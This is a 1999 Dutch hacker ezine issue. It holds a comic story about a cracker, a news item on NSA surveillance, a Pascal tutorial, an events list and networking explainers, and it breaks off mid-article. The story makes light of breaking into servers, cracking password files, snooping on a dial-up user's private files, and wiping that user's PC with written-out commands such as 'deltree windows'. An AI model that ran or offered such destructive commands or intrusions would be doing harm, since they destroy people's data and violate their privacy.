Copy Link
Add to Bookmark
Report
Hackers 4 Hackers #2
Hackers 4 Hackers Issue 2, released on 12-06-1999
___ ___ _____ ___ ___
/ | \ / | | / | \
/ ~ \/ | |_/ ~ \
\ Y / ^ /\ Y /
\___|_ /\____ | \___|_ /
\/ |__| \/
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
|h|a|c|k|e|r|s| |4| |h|a|c|k|e|r|s| |0|2|
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
http://www.hackers4hackers.org
'12-06-1999'
Om je aan te melden bij de maillijst kan je een mailtje sturen naar
subscribe@hackers4hackers.org met als titel "subscribe h4h emailadres"
Of je kan je online aanmelden op http://www.hackers4hackers.org
Artikelen en dergelijke kun je mailen naar post@hackers4hackers.org
Vragen kun je mailen naar de desbetreffende auteur of ook naar
post@hackers4hackers.org
Enkele interessante sites:
http://www.dutchthreat.org
http://security.pine.nl
http://www.hit2000.org
01. Disclaimer....................................... (Redaktie)
02. Inleiding........................................ (Redaktie)
03. Leven van een Cracker dag 1...................... (drgenius)
04. Stukje NRC: Rapport over NSA..................... (Redaktie)
05. Programmeren in Pascal........................... (RaViTy)
06. Evenementen...................................... (Redaktie)
07. Aanvulling stukje Ethernet....................... (Skin Quad)
08. Hoge snelheids IP netwerken...................... (Maniac)
09. NFS server scan.................................. (Gerrie)
10. Carding.......................................... (Avatar)
11. Aanvulling Cold Fusion.......................... (Asby)
12. Ditjes en Datjes................................. (Asby)
---------------
01. Disclaimer
---------------
We zijn niet verantwoordelijk voor datgene wat jullie met deze
informatie doen. Deze informatie dient alleen voor educationele
doeleinden. Als je in problemen komt, kan je ons niks verwijten.
Gebruik maken van deze informatie kan strafbaar zijn. Meningen van
auteurs hoeven niet hetzelfde te zijn als die van de redactie.
--------------
02. Inleiding
--------------
Eindelijk, na veel werk was H4H-01 klaar. Effe rust voor de
redactie, maar nee, het commentaar stroomde al binnen. Men vond
H4H geen goed beeld geven over hackers. Hiermee werd vooral het
deel bedoeld over virussen maken en formateren van harde schijven.
Dit heeft inderdaad niets met hackers te maken. Vooral Gerrie,
bekend van Hit2000 kreeg veel klachten binnen, omdat men dacht dat
H4H bij HIT2000 hoorde. Dit is dus echter niet het geval. H4H staat
los van HIT2000, althans nu. Wil men in de toekomst commentaar
leveren (dan kunnen we er wat mee doen) surf dan naar onze website
(http://www.hackers4hackers.org) en vul uw commentaar in bij de
commentaar-pagina.
Als er mensen zijn die een artikel willen schrijven of graag een
artikel over een bepaald onderwerp willen zien, kan dat op dezelfde
pagina. Tevens kan men hier ditjes en datjes opgeven.
We kunnen H4H niet maken zonder uw hulp. Dus als je denkt dat je
over een bepaald technisch onderwerp een leuk artikel kan schrijven
schaam je dan niet om dit te doen en op te sturen naar H4H
(post@hackers4hackers.org)
De redactie bedankt iedereen voor het meewerken aan H4H.
De redactie
---------------------------------
03. Leven van een Cracker, dag 1
---------------------------------
De cracker: dag 1
Volledig geisoleerd zit de cracker vol verwachting te scannen, verstomd,
zonder enige notie van audio-input, afgesloten van de rest van de wereld,
en het lukt. Kijk....... schrik.... adrenaline-verhoging..... en JA ....
beta 18 YES :-). Kippevel omringt zijn lichaam. Snel runt de cracker
home-made-progd scripts die een ware lust voor het oog zijn voor newbies..
het lukt.... shaggies beginnen untouched op te branden, bier is niet meer
belangrijk en msg's zijn irritant... De cracker wordt 1 met zijn keyboard,
naar de WC gaan is een irritante noodzaak, eten wordt een op maximaal
aantal kaakbewegingen per seconde gebaseerde methode. Shaggies verstrijken
Dan gebeurt het..... WoW, stoer, vet, bruut vindt de cracker, gedachtes
spelen door zijn c-geinfecteerde hersenen, hij zou natuurlijk dit scriptje
kunnen uitvoeren... eerst ff bier pakken... en iets te kanen, chips ofzow.
Al chips-etend, shaggie draaiend en bier zuipend tracht de cracker een
lamer op IRC te dumpen, een met xxx passes gevulde john-sessie bij te
houden, ICQ messages te replyen, zijn nieuwe HPCV site bij te houden en
dat terwijl de beta 18 bug hem met zachtsmekende woordjes roept. Stress...
bloeddrukverhoging..... de cracker besluit alles behalve FTP te sluiten.
Met een aan zekerheid grenzende waarschijnlijkheid heeft de cracker nu
sanitaire behoeftes binnen nu en the actual hack dus hij besluit maar vast
naar de WC te gaan... Aaahhhhh enz... Beterz. De cracker vangt tijdens het
teruglopen naar pc audioinput op van zijn ouders als: "stop je er zo mee?"
Wetend nog zeker 20 minuten nodig hebbend antwoord de cracker: "ja ma, nog
5 minuten". De cracker snelt terug naar zijn bak na de uit voorzorg
genomen sanitaire stop en voert het wu_ftpbug_exploit_script uit. ??????'s
verschijnen op het scherm, de cracker denkt: beterz. De cracker voert ff
get uit en ript de passwd-file, daarna voert hij ff john uit en hij heeft
weer een paar sites om te defacen. Alles goed denkt de cracker.... Maarja
de cracker heeft het via certain provider gedaan... Das pech, account weg,
maargoed lekker belangrijk ...........tring........tring........ telefoon.
Zweetdruppels verschijnen op het voorhoofd van de cracker als de naam van
de provider klinkt waarvandaan de cracker de vele sites heeft gedefaced.
"Hallo..." ",Ja goedendag met lame internet BV" klinkt het. Shit denkt de
cracker, al zijn social engineering ervaring bij elkaar aan het rapend
zegt hij: "godver alweer zo'n irritant telefonisch verkoopbedrijf, kunnen
jullie me niet eens met rust laten ?" "Ik koop niet via de telefoon" weet
de cracker er nog uit te persen. Het antwoord van de ISP luid vervolgens
ongeveer zo : "Nou we willen u even erop wijzen dat......", "Oja dat zijn
jullie, nou mooi dat ik jullie spreek, ROT OP" schreeuwt de cracker,
"ik kreeg vorige keer ook al irritante email van jullie, zo van: u dient
te stoppen met de attacks. Godver mijn account is gehackt, allemaal vage
computerinbrekers die mijn email kunnen lezen en dat mij ook nog vertellen
ook. Kunnen jullie er niet voor zorgen dat DAT niet kan gebeuren, stomme
idioten, sterker nog ik zeg mijn account op bij deze, en nix schriftelijk
en als jullie me nog eens opbellen / emailen klaag ik jullie aan wegens
schending van mijn prive-rechten want dat is tenslotte al gebeurd door
computerinbrekers die mijn email lezen omdat jullie er een achterlijke
manier van configureren op na houden, en als u mij wilt excuseren ik ben
ff druk bezig met mijn vriendin te bevredigen, wat mij al 3 maanden niet
meer is gelukt, so if you don't mind" tuut.. tuut.. tuut.. Zich intern
doodlachend ziet de cracker dat zijn bier op is... ff biertje pakken......
of beter, de hele krat naast zich neer zetten. Al piekerend realiseerd de
cracker zich dat hij nog weed heeft, beterz.... blowtje draaien...... shit
tippies op, dan maar weer kaftje van cd molesteren. Na kwartiertje zoeken
in de puinhopen in zijn kamer (bierblikjes, rondslingerende cd's, 10
miljoen rondslingerende notitiebriefjes met vage IP nummers en ranges,
diverse emails en andere onzin plus een zootje lege afgekauwde pennen)
vind hij eindelijk het doel: het cd kaftje waarmee hij tippie kan draaien.
Beterz, blowen..... ff sepultura cd rehashen want die was al 3 uur gestopt
terwijl de crackers' koptelefoon nog altijd op zijn hoofd zit zonder
geluid te produceren. Beterz muziek....... nou toch maar nog ff wat hacken
vind de cracker. Hmmzzzz wat zullen we nou s proberen, tiepend op de maat
van de muziek besluit de cracker maar ff wat shares te mappen van
lame kutprovider die net belde, alijd handig die dialups denkt de cracker
bij zichzelf...... hmzzzz..... gelukt..... ff kijken wat deze dude op zijn
pc heeft staan. Dir en type achtige commando's razen over het beeldscherm.
grappig een mirc.ini...... ff geintje uithalen denkt de cracker. Hmmmzzz
grappig, hij gebruikt zelfde irc server als ik, ff auto-oppie toevoegen in
mirc.ini..... hehe beterz ga ik nu ff chatten denkt de cracker, ff grappie
uithalen. Na een whois heeft de hacker de lamer op dcc-chat, hehe beterz..
"Ik zit in je pc :)", "jaja, tuurlijk" klinkt de respons, "JA" zegt de
cracker, "geloof je me niet ?", "natuurlijk niet" klinkt het antwoord.
"Hmmzzzz ok" zegt de cracker "ff kijken, je hebt net email gehad van
je zus, die is zwanger van de groenteboer en haar vriend die werkeloos is
en haar slaat mag het niet weten :)", "hehe das toeval dat je dat zegt"
zegt de lamer. "eikel" zegt de cracker, "je inbel passwoord is droplul, je
hebt gister 3 uur lang geinternet, je hebt www.animalsex.com bekeken en je
belastingaangife bedroeg Fl 25.849,- geloof je me nu?", "nee dat kan
iedereen zeggen" zegt de lamer. "Nou moet je kappen" zegt de cracker
"anders delete ik gewoon alles, geloof je me dan?", "ja dan geloof ik je
wel" zegt de lamer. *grin* "ok" attrib -r -h *.*, del. , deltree windows,
deltree progra~1, deltree mijndo~1 .... zo uitgespeeld voor vandaag denkt
de cracker. PLOP! uit die pc, morgen weer verder spelen.
Dit was dag 1 uit het leven van de cracker, meer zullen volgen -=8-)
drgenius
---------------------------------
04. Stukje NRC: Rapport over NSA
---------------------------------
Rapport over NSA:
Gebruikers Internet bespioneerd
Door onze redacteur MARIE-JOSÉ KLAVER ROTTERDAM, 2 JUNI.
De Amerikaanseinlichtingendienst National Security Agency NSA) bespioneert
Internetgebruikers en bedrijven via veelgebruikte computerprogramma's als
Lotus Notes en de browsers Explorer en Netscape.
Ook heeft de NSA directe toegang tot negen centrale punten in de transat-
lantische Internetverbindingen om datacommunicatie af te luisteren.
Dit staat in een nieuw rapport van de wetenschappelijke werkgroep van het
Europees Parlement, het Science and Technology Options Assessment. In het
rapport, getiteld Development of surveillance technology. Interception
capabilities 2000, wordt aan de hand van voorbeelden en uitgelekte ver-
trouwelijke informatie een gedetailleerd beeld geschetst van het aftapnet-
werk van de NSA, dat onder de codenaam Echelon bekend staat.
Een eerder rapport over het stelselmatig aftappen van Europees telefoon-,
fax- en e-mailverkeer zorgde vorig jaar voor veel opschudding in de Euro-
pese Unie. Het Europees Parlement keurde de afluisterpraktijken in een re-
solutie af.
Op grond van openbare bronnen en gesprekken met ex-medewerkers van de NSA
en de Britse geheime dienst GCHQ onthult de werkgroep met wat voor tech-
nische middelen de Amerikaanse inlichtingendienst alle Europese datacom-
municatie onderschept en afluistert. Behalve over een uitgebreid satelliet-
netwerk met grondstations in de VS, Groot-Brittannië en Australië, beschikt
de NSA ook over directe toegang tot de backbone (ruggengraat) van grote
Internetbedrijven en telecomoperators als Pacific Bell en MCI. Volgens
Wayne Madsen, een voormalige spion van de NSA, heeft de geheime dienst al
sinds 1995 op centrale punten in het Internet zogeheten sniffers geïnstal-
leerd om e-mail en ander Internetverkeer af te tappen. Met behulp van digi-
tale woordenboeken en slimme zoekprogramma's worden de onderschepte be-
richten gescand op trefwoorden.
Uit de publiek toegankelijke patentendatabank van softwaregigant IBM blijkt
dat de NSA sinds 1993 twintig patenten heeft aangevraagd voor speciale
high tech afluisterapparatuur, zoekfilters en versleutelingsprogramma's.
Zo heeft de inlichtingendienst in 1995 een patent gekregen voor een
speciale methode om berichten over hetzelfde thema te onderscheppen en in
een databank op te slaan, 'topic spotting' geheten. Volgens het rapport
wordt 'topic spotting' door de NSA gebruikt om profielen aan te leggen van
mensen en bedrijven die over bepaalde onderwerpencommuniceren.
'Topic spotting' zal op den duur het selecteren op enkele trefwoorden ver-
vangen, zo wordt voorspeld in Development of surveillance technology.
---------------------------
05. Programmeren in Pascal
---------------------------
01-05-1999
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
x Programmeren in het algemeen x
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
= - Door RaViTy van HaVeN. - =
=- Hehe, als je al een goede coder bent mag je deze tutorials overslaan.
1. Introductie
2. Basisbeginselen
1. Introductie
In deze tutor behandelen we de mooiste programmeertaal aller tijden:
Pascal.
Het handige van pascal is dat je er gemakkelijk assembler mee linkt, en
er is de mogelijkheid inline assembler te gebruiken.
Er zijn vele versies van pascal compilers verkrijgbaar: Turbo Pascal,
Borland Pascal, TMT etc. Alle voorbeelden in deze tutorial zijn getest
met Turbo Pascal 7.0 en Borland Pascal 7.0.
Voor grote demo's wordt meestal c++ gebruikt, omdat de compiler iets
krachtiger is dan die van pascal,
maar in 4k demo's wordt pascal nog vaak gebruikt, omdat de compiler van
pascal zeer kleine files maakt.
Verder zijn er veel mensen die denken dat alleen c++ Object Oriented
Programming OOP ondersteunt, maar dat is onzin. Bijna alle talen kunnen
dat, en natuurlijk is pascal geen uitzondering op deze regel.
Borland Pascal is net iets uitgebreider dan Turbo Pascal. Deze versie
ondersteunt windows compiling, en protected mode.
2. Basisbeginselen
Start TURBO.EXE, BP.EXE of als je een compiler hebt zonder IDE
(Integrated Development Iveronment), zo'n ingebouwde editor, dan kun
je ook kladblok voor windows of de doseditor gebruiken.
Ok, we beginnen met een makkelijk programmatje dat een regel op het
scherm
zet:
(Typ de " " niet over)
"program hallo;" << Let op de [;]!
" " << open regel (Hoeft niet perse)
"var MijnNaam:string;"
"begin"
"writeln('Hallo, Hoe heet jij?');" << Let op de [']!
"writeln;"
"write('--> ');"
"readln(MijnNaam);" << Wacht op een input
"writeln('Hallo, mijn naam is ',MijnNaam);"
"readln;"
"end." << Let op de [.]!
Ok, als je het nog niet snapt leg ik alles even uit.
-program: Elk programma begint hiermee, je kunt bijna alles als programma
naam bedenken. Zie de lijst van gereserveerde woorden onderaan
in deze tutor, die mag je niet gebruiken omdat de compiler dan
in de war raakt. Zet dit altijd helemaal bovenaan in je
programma. Het is niet perse nodig om program te gebruiken,
maar het is wel handig zodra je met units gaat werken, zodat er
een overzicht blijft.
-var: Hier kun je variabelen declareren. Dit klinkt misschien moei-
lijk, dus zal ik proberen het iets eenvoudiger te maken.
Je kunt je een variabele voorstellen als een lege doos, waar je
iets in wilt doen. Als je meerdere variabelen, dus dozen, wilt
hebben zet je met een dikke stift op elke doos wat er straks in
moet komen te zitten. Dit kan een regel zijn, of een getal,
er zijn teveel mogelijkheden om op te noemen. Je zet er ook een
naam op, zodat je later kan zien in welke doos je de regel of
het getal moet stoppen.
Dus als er staat: Var MijnNaam:String; wil dat zeggen:
een variabele (doos) met de naam MijnNaam, is bedoeld om een
regel (string) of lijn tekst in te stoppen.
Nog een voorbeeld: Var Hoeveelheid:Integer; dit wil zeggen:
een variabele met de naam Hoeveelheid, is bedoeld om een geheel
getal (integer) in te stoppen.
Als je het nog niet snapt is het niet erg, misschien snap je
het wel als we iets in de variabele hebben gestopt. Dat zie je
zo.
-begin: Dit geeft aan dat vanaf hier alle statementen komen.
Bij assembler zou dit het CODE segment zijn ( .CODE).
Hier is al vast het eerste verschil tussen batch en pascal,
er zijn aparte segmenten. Je hebt een data en een code segment.
Het data segment is het gedeelte waar de variabelen, constanten
(waar we het later nog over gaan hebben) en typen (ook later)
gedeclareerd worden. Het code segment is het gedeelte na BEGIN,
waar alle commando's worden gegeven.
-writeln: Writeln (lees: write line >> Schrijf een regel) laat een
regel op het scherm verschijnen. Je kunt writeln op twee manie-
ren gebruiken:
1. Writeln('Hallo'); >> Als je het programma draait zie je
daadwerkelijk hallo op je scherm.
2. Writeln(Hallo); >> De compiler zoekt nu naar een
variabele met de naam Hallo en
geeft die weer op het scherm.
Er moet wel eerst iets aan de
variabele toegekend worden.
3. Writeln; >> Een regel overslaan.
** Na een writeln verplaatst de cursor altijd naar de volgende
regel **
(Als je van de variabelen nog niks snapt, lees dan gewoon nog
even door. Als je aan het einde van deze tutor het nog niet
snapt moet je alles nog eens rustig doornemen.)
Kijk eens even naar deze regel:
Writeln('Hallo, mijn naam is ',MijnNaam);
Als je bij readln "Al Bundy" hebt ingevoerd, zie je bij de
uitvoer:
"Hallo, mijn naam is Al Bundy"
Hier werden dus de eerste twee manieren van het gebruik van
writeln gecombineerd. Zowel de directe als de variabele manier.
-write: Werkt hetzelfde als writeln, maar de cursor blijft aan het
einde van deze regel, en gaat dus niet naar de volgende regel.
-readln: Readln (lees: Read line >> Lees regel) is een commando dat
wacht op een invoer.
Voorbeeld: Readln(MijnNaam); Het programma stopt hier even
en wacht op een invoer. Deze invoer wordt opgesla-
gen in de variabele die tussen haakjes staat.
Stel de invoer was "Al Bundy", dan slaat de compi-
ler de regel "Al Bundy" op in de variabele (doos)
met de naam MijnNaam.
(Als je nu nog niks snapt van de variabelen moet je even alles
rustig overnieuw lezen.)
Readln; (dus zonder variabele) betekent gewoon dat de compiler
wacht op een invoer, of gewoon ENTER, maar niet op-
slaat in een variabele.
-end: End geeft aan dat dit het einde is. Het einde van het code
segment dus. (Er komt niks meer na het code-segment)
Let op de [.] Gebruik "END." helemaal aan het einde. "END." is
dus altijd je laatste regel. Later zullen we procedures behan-
delen, die beginnen ook met "begin" maar eindigen met "end;",
dus zonder punt. De compiler weet dan dat dat niet het echte
einde is, maar het einde van een procedure.
Lijst van gereserveerde woorden:
Absolute Div For Interface Of Set
And Do Forward Interrupt Or Shl
Array Downto Function Label Packed Shr
Asm Else Goto Library Private String
Assembler End If Mod Procedure Then
Begin Export Implementation Name Program To
Case Exports In Near Public Type
Const External Index Nil Record Unit
Constructor Far Inherited Not Repeat Until
Destructor File Inline Object Resident Uses
nog een paar:
Var
Virtual
While
With
Xor
Dit is het einde van deel 2. Volgende keer maken we een rekenmachine,
en leer je meer van de mogelijkheden van Pascal.
Yours Truly,
RaViTy
----------------
06. Evenementen
----------------
H4H zoekt nog steeds mensen die naar een of andere meeting is
geweest waar technische zaken werden besproken en hier misschien
een leuk verhaaltje over willen schrijven.
Evenementen voor de komende twee maanden:
Inleiding Cryptografie door Interprom
Binnen de cursus komen de volgende onderwerpen voor:
Basisconcepten, Symmetrische systemen, Asymmetrische systemen,
Authenticatie en integriteit, Sleutelbeheer en netwerkbeveiliging.
Datum: 16-06-1999
Lokatie: Onbekend, NL
www.interprom.nl/Nederlands/training/Cursusbeschrijving/iss02.htm
The Black Hat Briefings '99
The Black Hat Briefings is een jaarlijks security congres.
Belangrijkste onderwerpen van het 2-daagse congres zijn dit jaar
onder andere: inbraakdetectiesystemen, incident repons, zwakheids
analyse, veilige programmeer technieken, hoe analyse en monitoring
tools te selecteren en aan computerbeveiliging gerelateerde
beheersvraagstuken.
Datum: 07-07-1999 t/m 08-07-1999
Lokatie: Las Vegas, US
Homepage: http://www.blackhat.com/
DEF CON 7
DEF CON is een jaarlijks computer-underground feest voor hackers in
Las Vegas.
Datum: 09-07-1999 t/m 11-07-1999
Lokatie: Las Vegas, Nevada, US
Homepage: http://www.defcon.org/
De redactie (Bron: http://security.pine.nl)
-------------------------------
07. Aanvulling stukje Ethernet
-------------------------------
Aangezien mij het idee bekroop dat er aantal mensen graag
de hacker of cracker willen uithangen maar de basics
nog niet kennen heb ik dit artikel maar geschreven. Ik pretendeer
zelf geen hacker/cracker te zijn (al heeft het wel mijn permanente
interesse) en heb dus in principe meer kennis over cisco/routing
problemen/etc dan over 'hacken'.
Het fenomeen 'spoofen' (van IP of MAC adres) blijft maar terug komen
in de diverse newsgroups. Hier even wat achtergrond idee'en
over routering (tja, dat blijft toch me technoknobbel) en
de betekenis van de MAC (Media Access Control) daarin.
Iedereen heeft wel eens een traceroute gezien, bijvoorbeeld:
1 insgate.stack.nl (131.155.141.1) 0.756 ms 0.615 ms
2 rsm-lg1.tue.nl (131.155.140.3) 4.484 ms 1.46 ms
3 tue-gw.tue.nl (131.155.14.1) 1.488 ms 1.362 ms
4 AR1.Eindhoven.surf.net (145.41.177.193) 1.573 ms 1.468 ms
5 BR2.Eindhoven.surf.net (145.41.7.161) 1.444 ms 1.437 ms
6 BR7.Amsterdam.surf.net (145.41.7.198) 4.461 ms 4.487 ms
7 BR1.Amsterdam.surf.net (145.41.7.142) 4.871 ms 4.677 ms
8 go2.2001.net (193.148.15.66) 5.813 ms 5.029 ms 4.993 ms
9 car1-ams-atm5-0-0.global-one.nl (194.235.236.5) 7.044 ms 7.801 ms
10 ATM-155MB.widexs.nl (194.235.236.166) 46.057 ms 52.661 ms
11 HOSTED-BY.widexs.nl (195.61.111.194) 13.275 ms 15.59 ms
Zoiets kan iedere PC gebruiker tevoorschijn toveren, onder
windows msdos prompt wordt het commando 'tracert www.quad.nl'
gebruikt, voor de Linux gebruikers is het gewoon 'traceroute
www.quad.nl'.
Afhankelijk van de provider/drukte/collisions/ICMP filtering
zal er zo'n zelfde route te voorschijn komen. Als ik dus
een http request doe voor www.quad.nl leggen alle pakketjes
deze route af (indien er geen storingen zijn, etc).
Nou een beetje meer achtergrond info:
Alle routers/bridges/nics/etc hebben een MAC adres, het MAC
adres 'kent' de fabrikant toe aan het stukje hardware. In principe
is het MAC adres uniek voor dat stukje hardware en zal
er nergens op deze aardkluit voorkomen (tenminste dat is de
bedoeling).
Als een PC (via NIC of modem) een tcp/ip pakketje verstuurd naar
een IP adres komt het eerst aan bij de eerste hop (in dit geval
insgate.stack.nl). Nu zou je natuurlijk kunnen denken dat
de router even in z'n tabelletje opzoekt welke interface
hij het pakketje moet doorsturen op bais van een IP adres, de
realiteit is ietsje anders.
Een node stuurt een pakketje naar een andere node op een
ander netwerk. Het pakketje wordt pakketje wordt verstuurd
op basis van het netwerk/node adres van de destination node.
Echter voordat het pakketje verstuurd wordt, voegt de node
het MAC layer adres van de router aan het pakket toe. Het
MAC layer adres is dus een gedeelte van de data link layer.
Dankzij dat MAC adres komt het pakket aan bij de router. Die router
bekijkt het netwerk/node adres van de destination node. Vervolgens
controleert de router of ie het pakket kan versturen of niet. Als
er geen route voor de destination node bestaat zal hij het pakketje
wegkieperen of gefowarded worden naar de default route.
Indien de volgende hop niet de destination node is (meeste gevallen)
dan zal de router de volgende hop bepalen, het MAC adres van het
pakketje strippen (zijn eigen MAC adres dus) en het MAC adres
van de volgende hop ervoor in de plaats neerzetten en het pakketje
forwarden. Dit gaat zo door tot de een-na-laatste hop (laatste
router) het pakketje kan forwarden naar het destination netwerk/node
adres. Het enige constante in het pakketje is dus het destination
netwerk/node adres, dat verandert dus absoluut niet. Het enige
wat elke hop verandert is dus het MAC (hardware) adres.
Skin Quad
--------------------------------
08. Hoge snelheids IP netwerken
--------------------------------
Het aantal toepassingen dat gebaseerd is op het Internet Protocol (IP)
neemt sterk toe. Via het internet kan toegang worden gekregen tot
talloze diensten die op het IP zijn gebaseerd. Daarbij moet onder meer
gedacht worden aan email, websurfen en het downloaden van software,
maar ook aan minder bekende diensten zoals IP-telefonie. Door de sterke
groei van het op IP gebaseerde teopassingen neemt de vraag naar hoge
snelheid IP-netwerken toe. Aan deze vraag zal slechts in beperkte mate
tegemoet gekomen kunnen worden, zolang voor het bouwen van IP-netwerken
van traditionele concepten wordt uitgegaan. Nieuwe concepten voor het
realiseren van hoge snelheid IP-netwerken zijn nodig. Dergelijke snelle
netwerken zullen het gebruik en verdere ontwikkeling van IP-diensten
veilig moeten stellen. In dit artikel wordt een overzicht gegeven van
enkele ontwikkelingen zijnde, nieuwe concepten.
De toenemende behoefte aan zeer snelle IP-netwerken is op een drietal
oorzaken terug te voeren. Allereerst zijn er steeds meer computers op
IP-netwerken aangesloten. Het aantal computers dat op IP-netwreken is
aangesloten is nu ruwweg 20 miljoen. Dit aantal vertienvoudigt ongeveer
elke vier jaar (voor meer internet-statistieken http://www.nw.com).
Ten tweede is er sprake van een sterk toenemened aantal multimedia-
toepassingen. Toepassingen voor het internet die gebruik maken van
muziek, spraak en fotomateriaal zijn in opmars. Deze multimedia-
toepassingen kenmerken zich door een grote hoeveelheid te transporteren
informatie. Dit aanbod van 'enen' en 'nullen' is velen malen groter dan
voor tekstgeoriënteerde toepassingen geldt. De ontwikkeling van
multimedia-toepassingen is mede in zo'n stroomversnelling geraakt door
de komst van steeds krachtigere multimedia-PC's.
Als laatste is de vraag naar nieuwe, real-time interactieve
IP-toepassingen toegenomen. Wat dan met name een rol speelt is de
snelheid waarmee aangeboden informatiepakketjes, de zogenaamde IP-
datagrammen, door een IP-netwerk kunnen worden verwerkt. Aan die ver-
werkingssnelheid worden door real-time IP-toepassingen zoals 'telefonie-
over-internet' en videocommunicatie stringende eisen gesteld. Om de
maximale eind-eind vertraging die IP-datagrammen onderweg oplopen te
beperken, is het wenselijk die informatiestroom in kleine IP-datagrmmen
op te delen. Voor het vervoeren van een relatief geringe hoeveelheid te
vervoeren informatie moeten dan relatief veel IP-datagrammen worden
getransporteerd.
We weten echter dat vanuit technisch oogpunt de doorvoersnelheid van de
huidige IP-netwerken vooral beperkt wordt door het tempo waarin IP-
datagrammen verwerkt kunnen worden. Wat de oorzaak is van deze
beperking van deze traditionele IP-netwerken komt ook in dit artikel
aan de orde.
Gelaagdheid van IP-netwerken
Om te begrijpen hoe de nieuwe concepten voor hoge snelheid IP-netwerken zijn opgezet, is
inzicht nodig in de structuur van IP-netten. In dit artikel wordt een
vereenvoudigde vierlaagse structuur voor publieke IP-netwerken gehan-
teerd. Deze netwerkstuctuur zal laag voor laag worden toegelicht.
DE TRANSMISSIELAAG
De transmissielaag is de onderste laag van een IP-netwerkstructuur.
Deze laag bestaat uit vaste verbindingen in het openbare transmissie-
netwerk. Deze vaste verbindingen hebben een starre opbouw van mogelijke
transmissiecapaciteiten, bestaande uit verbindingen met snelheden uit-
eenlopend van 2 Mbit/s tot 2,4 Gbit/s.
DE SCHAKELLAAG
De schakellaag is de laag boven de transmissielaag. Als overlay-netwerk
kan op de transmissielaag van vaste verbindingen een publieke schakel-
laag worden gepositioneerd. In dit artikel beperken we ons tot een
ATM-schakellaag. Met ATM (Asynchronus Transfer Mode) kan de capaciteit
van een vaste verbinding tussen twee ATM-switches ten behoeve van ver-
schillende toepassingen traploos over verschillende ATM-verbindingen
worden verdeeld.
Via de schakellaag kan zodoende een voor de toepassingen gewenste
flexibiliteit worden gerealiseerd (capaciteit- op-verzoek), die in de
transmissielaag ontbreekt. Daarnaast bestaan er ATM-verbindingen met
verschillende verkeerskarakteristieken, waardoor geschiktheid ontstaat
voor toepassingen die sterk uiteenlopende verkeersprofielen genereren.
Kenmerkend voor ATM-netwerken is dat hoge transportsnelheden gereali-
seerd kunnen worden. Het gebruik van een ATM-schakellaag als tussenlaag
tussen de transmissielaag en de nog te bespreken IP-netwerklagen is
overigens niet strikt noodzakelijk. Voor een aantal nieuwe concepten op
het gebied van hoge snelhied IP-netwerken is de ATM-laag echter wel
gewenst c.q. noodzakelijk.
DE IP-NETWERKLAAG
De IP-netwerklaag is als overlay-netwerk bovenop de transmissielaag en
de ATM-schakellaag gepositioneerd. Traditioneel verzorgt de IP-
netwerklaag een 'best-effort' transportdienst voor IP-datagrammen ten
behoeve van IP-toepassingen. In het vervolg van dit artikel worden de
eigenschappen van de IP-netwerklaag nader beschouwd en wordt bekeken
hoe een IP-netwerk met hoge snelheid gerealiseerd kan worden.
DE IP-APPLICATIELAAG
De bovenste laag van de structuur is de IP-applicatielaag. In deze laag
bevinden zich de op het IP-protocol gebaseerde toepassingen. Hierbij
kan o.a. gedacht worden aan gegevensoverdracht via het File Transfer
Protocol (FTP). Deze toepassingen kunnen bijvoorbeeld worden geïmplen-
teerd door middel van IP-applicatieservers in het netwerk. Gebruikers
kunnen met deze servers communiceren door in hun eindapparatuur een IP-
protocol stack en IP-applicatie client-software te implementeren. De
IP-applicatielaag valt overigens buiten het bereik van dit artikel.
De werking van IP-netwerken
IP-netwerken zijn label-geschakeld: alle informatie die via zo'n net-
werk wordt verzonden, wordt eerst in stukjes verdeelt, waarna aan elk
stukje informatie een label wordt toegevoegd. Aan de hand van dat label
wordt de informatie door het netwerk getransporteerd. Een IP-netwerk
levert een connectionless dienst. Kort samengevat komt die connection-
less dienst erop neer dat de informatie die getransporteerd moet
worden, in stukken (IP-datagrammen) wordt verdeeld. Aan zo'n IP-data-
gram wordt vervolgens het voluit geschreven, eenduidig IP-bestemmings-
adres toegevoegd. Die IP-datagrammen worden individueel en onafhan-
kelijk van elkar door het IP-netwerk getransporteerd.
Een IP-netwerk kent twee typen netwerkelementen: eindstations (ofwel
IP-hosts) en IP-routers; kortweg hosts en routers genoemd. In de hosts
draaien de gebruikerstoepassingen zoals email en WWW-toepassingen. De
hosts zijn met elkaar verbonden door middle van netwerken van met
elkaar communicerende routers. De hosts wisselen informatie uit door
IP-datagrammen te versturen die door de routers naar de correcte
bestemming moeten worden vervoerd. De belangrijkste taken die een
router hiervoor dient uit te voeren zijn het creëren van route-tabellen
(routering) en het doorsturen van IP-datagrammen (forwarding)
ROUTERING
De werking van een IP-netwerk kan worden vergeleken met de werking van
het wegennetwerk. De weggebruiker wordt aan de hand van borden op
kruisingen en splitsingen van wegen naar zijn plaats van besteming
geleid. De verantwoordelijkheid voor de aanwezigheid en actualiteit aan
de bewegwijzeringsinformatie ligt bij de ANWB. Een routeringsprotocol
zorgt voor uitwisseling van bereikbaarheidinformatie tussen 'buurt-
routers', dat wil zeggen de routers die rechtstreeks met elkaar ver-
bonden zijn. Deze buurt-routers delen elkaar mee welke netwerken via
hen bereikbaar zijn. Dit proces verloopt stapsgewijs: tijdens elke stap
krijgen de routers steeds meer bereikbaarheidsinformatie over verder
verwijderd liggende netwerken, net zo lang totdat elke router de
informatie van alle aangesloten netwerken heeft.
Beschikt de router over alle bereikbaarheidsinformatie, dan berekent
een routeringsalgoritme in elke router de zogenaamde routetabel. In
elke routetabel wordt elke mogelijk bestemming voor een binnenkomend
IP-datagram gekoppeld aan een volgende router op weg naar de bestemming.
Het uitvoeren van van het routeringsprotocol en algoritme is een cont-
inu proces.
Bij iedere verandering in het IP-netwerk --denk bijvoorbeeld aan een
nieuwe router die wordt geplaats of aan een storing in een verbinding--
zal de bereikbaarheidsinformatie veranderen.
Om correcte beslissingen over het doorsturen van IP-datagrammen te
kunnen nemen, dient de route-tabel dan ook voortdurend te worden
herberekend.
FORWARDING
Op basis van de informatie uit de routetabel die in het routeringspro-
ces wordt berekend, stuurt de router een IP-datagram verder in de
richting van de bestemming. Dit is het forwarding-proces.
Routeren en forwarding vergen zowel een grote processing-capaciteit als
een grote transmissie-capaciteit van routers. De inspanning van de
routers worden in de praktijk engszins verlicht, doordat de IP-adressen
